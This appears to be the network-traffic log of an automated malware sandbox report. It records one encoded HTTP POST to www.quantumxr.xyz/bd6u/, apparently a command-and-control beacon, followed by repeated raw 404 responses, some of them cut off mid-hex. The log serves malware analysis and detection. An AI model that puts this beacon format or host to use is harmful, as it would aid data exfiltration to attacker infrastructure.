                Source: unknownHTTP traffic detected: POST /bd6u/ HTTP/1.1Host: www.quantumxr.xyzAccept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: http://www.quantumxr.xyzReferer: http://www.quantumxr.xyz/bd6u/Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 221User-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50Data Raw: 2d 70 4b 70 57 38 44 48 3d 50 34 56 64 61 58 69 6a 68 4b 55 4f 63 65 55 4d 58 70 37 44 37 43 70 6e 34 2b 78 65 51 71 2f 34 43 78 57 51 58 75 74 65 4c 33 6b 66 75 66 71 39 6e 51 46 64 4a 30 76 32 48 31 65 42 6f 47 4b 51 68 4f 52 6a 6a 4e 57 58 4e 6d 7a 38 67 70 6a 48 72 45 30 51 39 58 48 4b 62 59 30 76 30 75 67 4e 6d 2b 43 66 42 7a 77 4e 2b 41 79 4a 33 59 33 54 54 42 57 4e 37 67 32 4e 4b 56 38 72 74 43 6f 76 58 76 36 39 73 73 69 4c 50 49 36 72 63 6d 6a 45 39 2b 73 4e 50 35 2b 64 46 5a 73 41 72 69 75 59 69 47 4b 56 66 4b 6c 57 75 4e 76 73 7a 71 76 79 53 4b 54 6f 6c 65 4b 6b 58 6e 33 75 51 47 77 33 36 4f 4b 76 57 71 68 46 76 55 45 4d 61 51 7a 51 71 41 3d 3d Data Ascii: -pKpW8DH=P4VdaXijhKUOceUMXp7D7Cpn4+xeQq/4CxWQXuteL3kfufq9nQFdJ0v2H1eBoGKQhORjjNWXNmz8gpjHrE0Q9XHKbY0v0ugNm+CfBzwN+AyJ3Y3TTBWN7g2NKV8rtCovXv69ssiLPI6rcmjE9+sNP5+dFZsAriuYiGKVfKlWuNvszqvySKToleKkXn3uQGw36OKvWqhFvUEMaQzQqA==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 17 Mar 2025 07:49:02 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 17 Mar 2025 07:49:04 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 17 Mar 2025 07:49:07 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 17 Mar 2025 07:49:09 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 17 Mar 2025 07:49:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 25 Jul 2023 10:57:52 GMTETag: W/"afe-6014d9a456b59"Content-Encoding: brData Raw: 35 31 33 0d 0a c1 e8 57 00 00 bf bd a8 fb ce fd 7c bd 5d 84 c4 aa b8 8e 93 34 19 8e 63 21 75 ed 36 e8 d6 aa 63 6c 7c a1 b3 7d 89 8f 9d ef 2c fb 92 26 4c f9 fb 48 73 87 06 ad 58 b5 56 b4 a5 9d 8a e8 04 a5 b0 8e 81 5a 21 3e 3a 21 7e 68 57 7e 56 21 f1 af f9 eb e2 5c b3 06 cd c6 74 77 6f 61 0c c3 76 48 9f 6b b3 28 4b 4e b8 9f 30 c5 f0 c1 24 08 a2 45 b0 28 86 38 4d 82 86 0f 96 4f d0 52 2d 36 31 19 0c 06 53 4b aa 13 d9 81 5f 0e 9e 2b b8 b5 6d 9a 74 ea 5d 78 57 ae cf 4f 7f f4 c9 c2 0c c4 2a e1 3e f2 62 95 70 e0 44 74 5a f8 33 82 7d e4 c5 94 44 3e f2 12 aa 08 84 31 c9 72 aa 5a 78 e6 de b4 f5 c1 02 06 db 47 9e 62 8a 53 bf 56 ae c1 2c e3 14 ee 48 05 b3 b2 2b 22 cf 56 4c 71 ea 23 ff 4b 04 49 68 0b 87 32 1d 64 ac 13 2b 0c a1 14 8a 0a d5 c2 d3 e3 2f 80 07 77 67 16 3f 9e 59 84 5b 22 9c c4 f7 cc 4c 06 52 e5 e7 d2 5b 77 ae cf 3c 28 cd ce cf cd cd df 07 c3 a6 9a d7 63 74 29 95 d9 1e bf c4 22 15 b7 22 da 63 21 b5 06 be 50 62 82 29 46 b8 95 87 84 d3 96 33 59 2e 25 4c b0 a4 9b 8c de 16 fb c8 cb d5 80 53 50 83 94 b6 b0 a2 7d 65 87 79 8e 7d 34 01 8f 10 00 40 42 b2 0e 13 2e 94 9b 67 65 4a a2 88 89 ce 51 1a 22 96 74 4c 03 81 cc 22 9a 4d d1 2e df 89 c7 1a 8b d3 b6 72 a1 42 93 26 1a 22 1d b0 e7 1e b2 47 b3 36 97 4b d6 c0 85 3c cc 24 e7 99 ce 09 48 f8 b0 93 c9 ae 88 5c 28 56 83 c6 7b 41 a3 89 86 28 90 d1 20 e7 9f a0 2d 85 b2 da 24 61 7c e0 02 36 7f 19 6d ce cd 57 b8 04 b7 29 cb 06 b2 04 78 fc 62 fc 3b 8c 7f 35 1b 66 d3 ec 9b 27 b8 04 f8 f6 5d 58 b8 21 55 cc 42 5c 02 6c 7e 33 67 e6 6b 73 b4 fe ca 6c c0 42 26 e1 7e 15 97 00 df 64 19 e9 30 21 e1 43 f2 b0 0b 37 a4 8a 59 08 0b 99 c4 25 c8 89 c8 ad 9c 66 ac dd 44 00 00 09 3f cf 71 26 a8 15 53 d6 89 95 0b ce 64 ad 89 36 9c b3 cf a9 0b 8d a9 77 6a dc 43 d1 be b2 08 67 1d e1 42 48 85 a2 d9 5c 6c 28 b9 cc 5c 58 8a 99 a2 74 35 38 25 e3 40 13 95 5a da 6f 4e 58 4b 39 c7 04 92 47 6e 02 0b 09 50 0c 09 a4 7a 30 90 4a c9 c4 85 4a 39 0d 50 fd e0 4d ca 7b 54 b1 90 94 d8 f0 86 28 ae e4 55 aa 4d 05 4f b4 7d 25 1a 03 0f 51 1a 0d bb e5 1d 32 54 fb 54 ca 6c cd 24 ed a7 9c 30 91 0e b7 ef 21 96 92 a9 0b 4e da 87 5c 72 16 41 b1 dd 56 9a d8 00 41 d2 97 48 fd e4 14 40 0b 57 cb 69 1f 48 57 49 07 03 a2 e5 d4 bd 50 31 24 dd 9c 16 3f cc 69 5b 19 51 ce 08 22 45 b9 c5 7a bd 2e 81 56 5d c6 a9 52 34 b3 f2 94 84 49 54 bb 85 47 83 56 ae 59 6c 3d ef d3 40 f6 53 01 b5 d4 99 aa 01 9a 9d 59 a2 dd ac 90 df 69 c8 9e 80 d6 db 67 40 08 c0 6c 9b d3 d1 ae 39 30 c7 e6 4b 73 89 50 6b 3b 15 26 6c f4 7e 42 23 46 40 0a 3e 80 3c cc 28 15 40 44 04 ef 26 4c 7c c3 79 2e 94 af 0e a7 49 3f be 51 6f a4 fd ab f0 08 15 8a 01 61 b5 50 28 30 8e 94 30 9d ee 76 0b 43 54 58 2b ed 85 42 4f b5 57 ea f3 23 f3 94 08 a3 48 3d 40 c6 8a ee b0 1d 26 b0 4a d5 90 66 4e a1 d0 b9 b8 f7 ec da 54 78 85 a8 a4 05 f8 8a f0 32 15 38 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 17 Mar 2025 07:49:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 25 Jul 2023 10:57:52 GMTETag: W/"afe-6014d9a456b59"Content-Encoding: brData Raw: 35 31 33 0d 0a c1 e8 57 00 00 bf bd a8 fb ce fd 7c bd 5d 84 c4 aa b8 8e 93 34 19 8e 63 21 75 ed 36 e8 d6 aa 63 6c 7c a1 b3 7d 89 8f 9d ef 2c fb 92 26 4c f9 fb 48 73 87 06 ad 58 b5 56 b4 a5 9d 8a e8 04 a5 b0 8e 81 5a 21 3e 3a 21 7e 68 57 7e 56 21 f1 af f9 eb e2 5c b3 06 cd c6 74 77 6f 61 0c c3 76 48 9f 6b b3 28 4b 4e b8 9f 30 c5 f0 c1 24 08 a2 45 b0 28 86 38 4d 82 86 0f 96 4f d0 52 2d 36 31 19 0c 06 53 4b aa 13 d9 81 5f 0e 9e 2b b8 b5 6d 9a 74 ea 5d 78 57 ae cf 4f 7f f4 c9 c2 0c c4 2a e1 3e f2 62 95 70 e0 44 74 5a f8 33 82 7d e4 c5 94 44 3e f2 12 aa 08 84 31 c9 72 aa 5a 78 e6 de b4 f5 c1 02 06 db 47 9e 62 8a 53 bf 56 ae c1 2c e3 14 ee 48 05 b3 b2 2b 22 cf 56 4c 71 ea 23 ff 4b 04 49 68 0b 87 32 1d 64 ac 13 2b 0c a1 14 8a 0a d5 c2 d3 e3 2f 80 07 77 67 16 3f 9e 59 84 5b 22 9c c4 f7 cc 4c 06 52 e5 e7 d2 5b 77 ae cf 3c 28 cd ce cf cd cd df 07 c3 a6 9a d7 63 74 29 95 d9 1e bf c4 22 15 b7 22 da 63 21 b5 06 be 50 62 82 29 46 b8 95 87 84 d3 96 33 59 2e 25 4c b0 a4 9b 8c de 16 fb c8 cb d5 80 53 50 83 94 b6 b0 a2 7d 65 87 79 8e 7d 34 01 8f 10 00 40 42 b2 0e 13 2e 94 9b 67 65 4a a2 88 89 ce 51 1a 22 96 74 4c 03 81 cc 22 9a 4d d1 2e df 89 c7 1a 8b d3 b6 72 a1 42 93 26 1a 22 1d b0 e7 1e b2 47 b3 36 97 4b d6 c0 85 3c cc 24 e7 99 ce 09 48 f8 b0 93 c9 ae 88 5c 28 56 83 c6 7b 41 a3 89 86 28 90 d1 20 e7 9f a0 2d 85 b2 da 24 61 7c e0 02 36 7f 19 6d ce cd 57 b8 04 b7 29 cb 06 b2 04 78 fc 62 fc 3b 8c 7f 35 1b 66 d3 ec 9b 27 b8 04 f8 f6 5d 58 b8 21 55 cc 42 5c 02 6c 7e 33 67 e6 6b 73 b4 fe ca 6c c0 42 26 e1 7e 15 97 00 df 64 19 e9 30 21 e1 43 f2 b0 0b 37 a4 8a 59 08 0b 99 c4 25 c8 89 c8 ad 9c 66 ac dd 44 00 00 09 3f cf 71 26 a8 15 53 d6 89 95 0b ce 64 ad 89 36 9c b3 cf a9 0b 8d a9 77 6a dc 43 d1 be b2 08 67 1d e1 42 48 85 a2 d9 5c 6c 28 b9 cc 5c 58 8a 99 a2 74 35 38 25 e3 40 13 95 5a da 6f 4e 58 4b 39 c7 04 92 47 6e 02 0b 09 50 0c 09 a4 7a 30 90 4a c9 c4 85 4a 39 0d 50 fd e0 4d ca 7b 54 b1 90 94 d8 f0 86 28 ae e4 55 aa 4d 05 4f b4 7d 25 1a 03 0f 51 1a 0d bb e5 1d 32 54 fb 54 ca 6c cd 24 ed a7 9c 30 91 0e b7 ef 21 96 92 a9 0b 4e da 87 5c 72 16 41 b1 dd 56 9a d8 00 41 d2 97 48 fd e4 14 40 0b 57 cb 69 1f 48 57 49 07 03 a2 e5 d4 bd 50 31 24 dd 9c 16 3f cc 69 5b 19 51 ce 08 22 45 b9 c5 7a bd 2e 81 56 5d c6 a9 52 34 b3 f2 94 84 49 54 bb 85 47 83 56 ae 59 6c 3d ef d3 40 f6 53 01 b5 d4 99 aa 01 9a 9d 59 a2 dd ac 90 df 69 c8 9e 80 d6 db 67 40 08 c0 6c 9b d3 d1 ae 39 30 c7 e6 4b 73 89 50 6b 3b 15 26 6c f4 7e 42 23 46 40 0a 3e 80 3c cc 28 15 40 44 04 ef 26 4c 7c c3 79 2e 94 af 0e a7 49 3f be 51 6f a4 fd ab f0 08 15 8a 01 61 b5 50 28 30 8e 94 30 9d ee 76 0b 43 54 58 2b ed 85 42 4f b5 57 ea f3 23 f3 94 08 a3 48 3d 40 c6 8a ee b0 1d 26 b0 4a d5 90 66 4e a1 d0 b9 b8 f7 ec da 54 78 85 a8 a4 05 f8 8a f0 32 15 38 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 17 Mar 2025 07:49:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 25 Jul 2023 10:57:52 GMTETag: W/"afe-6014d9a456b59"Content-Encoding: brData Raw: 35 31 33 0d 0a c1 e8 57 00 00 bf bd a8 fb ce fd 7c bd 5d 84 c4 aa b8 8e 93 34 19 8e 63 21 75 ed 36 e8 d6 aa 63 6c 7c a1 b3 7d 89 8f 9d ef 2c fb 92 26 4c f9 fb 48 73 87 06 ad 58 b5 56 b4 a5 9d 8a e8 04 a5 b0 8e 81 5a 21 3e 3a 21 7e 68 57 7e 56 21 f1 af f9 eb e2 5c b3 06 cd c6 74 77 6f 61 0c c3 76 48 9f 6b b3 28 4b 4e b8 9f 30 c5 f0 c1 24 08 a2 45 b0 28 86 38 4d 82 86 0f 96 4f d0 52 2d 36 31 19 0c 06 53 4b aa 13 d9 81 5f 0e 9e 2b b8 b5 6d 9a 74 ea 5d 78 57 ae cf 4f 7f f4 c9 c2 0c c4 2a e1 3e f2 62 95 70 e0 44 74 5a f8 33 82 7d e4 c5 94 44 3e f2 12 aa 08 84 31 c9 72 aa 5a 78 e6 de b4 f5 c1 02 06 db 47 9e 62 8a 53 bf 56 ae c1 2c e3 14 ee 48 05 b3 b2 2b 22 cf 56 4c 71 ea 23 ff 4b 04 49 68 0b 87 32 1d 64 ac 13 2b 0c a1 14 8a 0a d5 c2 d3 e3 2f 80 07 77 67 16 3f 9e 59 84 5b 22 9c c4 f7 cc 4c 06 52 e5 e7 d2 5b 77 ae cf 3c 28 cd ce cf cd cd df 07 c3 a6 9a d7 63 74 29 95 d9 1e bf c4 22 15 b7 22 da 63 21 b5 06 be 50 62 82 29 46 b8 95 87 84 d3 96 33 59 2e 25 4c b0 a4 9b 8c de 16 fb c8 cb d5 80 53 50 83 94 b6 b0 a2 7d 65 87 79 8e 7d 34 01 8f 10 00 40 42 b2 0e 13 2e 94 9b 67 65 4a a2 88 89 ce 51 1a 22 96 74 4c 03 81 cc 22 9a 4d d1 2e df 89 c7 1a 8b d3 b6 72 a1 42 93 26 1a 22 1d b0 e7 1e b2 47 b3 36 97 4b d6 c0 85 3c cc 24 e7 99 ce 09 48 f8 b0 93 c9 ae 88 5c 28 56 83 c6 7b 41 a3 89 86 28 90 d1 20 e7 9f a0 2d 85 b2 da 24 61 7c e0 02 36 7f 19 6d ce cd 57 b8 04 b7 29 cb 06 b2 04 78 fc 62 fc 3b 8c 7f 35 1b 66 d3 ec 9b 27 b8 04 f8 f6 5d 58 b8 21 55 cc 42 5c 02 6c 7e 33 67 e6 6b 73 b4 fe ca 6c c0 42 26 e1 7e 15 97 00 df 64 19 e9 30 21 e1 43 f2 b0 0b 37 a4 8a 59 08 0b 99 c4 25 c8 89 c8 ad 9c 66 ac dd 44 00 00 09 3f cf 71 26 a8 15 53 d6 89 95 0b ce 64 ad 89 36 9c b3 cf a9 0b 8d a9 77 6a dc 43 d1 be b2 08 67 1d e1 42 48 85 a2 d9 5c 6c 28 b9 cc 5c 58 8a 99 a2 74 35 38 25 e3 40 13 95 5a da 6f 4e 58 4b 39 c7 04 92 47 6e 02 0b 09 50 0c 09 a4 7a 30 90 4a c9 c4 85 4a 39 0d 50 fd e0 4d ca 7b 54 b1 90 94 d8 f0 86 28 ae e4 55 aa 4d 05 4f b4 7d 25 1a 03 0f 51 1a 0d bb e5 1d 32 54 fb 54 ca 6c cd 24 ed a7 9c 30 91 0e b7 ef 21 96 92 a9 0b 4e da 87 5c 72 16 41 b1 dd 56 9a d8 00 41 d2 97 48 fd e4 14 40 0b 57 cb 69 1f 48 57 49 07 03 a2 e5 d4 bd 50 31 24 dd 9c 16 3f cc 69 5b 19 51 ce 08 22 45 b9 c5 7a bd 2e 81 56 5d c6 a9 52 34 b3 f2 94 84 49 54 bb 85 47 83 56 ae 59 6c 3d ef d3 40 f6 53 01 b5 d4 99 aa 01 9a 9d 59 a2 dd ac 90 df 69 c8 9e 80 d6 db 67 40 08 c0 6c 9b d3 d1 ae 39 30 c7 e6 4b 73 89 50 6b 3b 15 26 6c f4 7e 42 23 46 40 0a 3e 80 3c cc 28 15 40 44 04 ef 26 4c 7c c3 79 2e 94 af 0e a7 49 3f be 51 6f a4 fd ab f0 08 15 8a 01 61 b5 50 28 30 8e 94 30 9d ee 76 0b 43 54 58 2b ed 85 42 4f b5 57 ea f3 23 f3 94 08 a3 48 3d 40 c6 8a ee b0 1d 26 b0 4a d5 90 66 4e a1 d0 b9 b8 f7 ec da 54 78 85 a8 a4 05 f8 8a f0 32 15 38 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 17 Mar 2025 07:49:50 GMTContent-Type: text/htmlContent-Length: 2814Connection: closeVary: Accept-EncodingLast-Modified: Tue, 25 Jul 2023 10:57:52 GMTETag: "afe-6014d9a456b59"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6
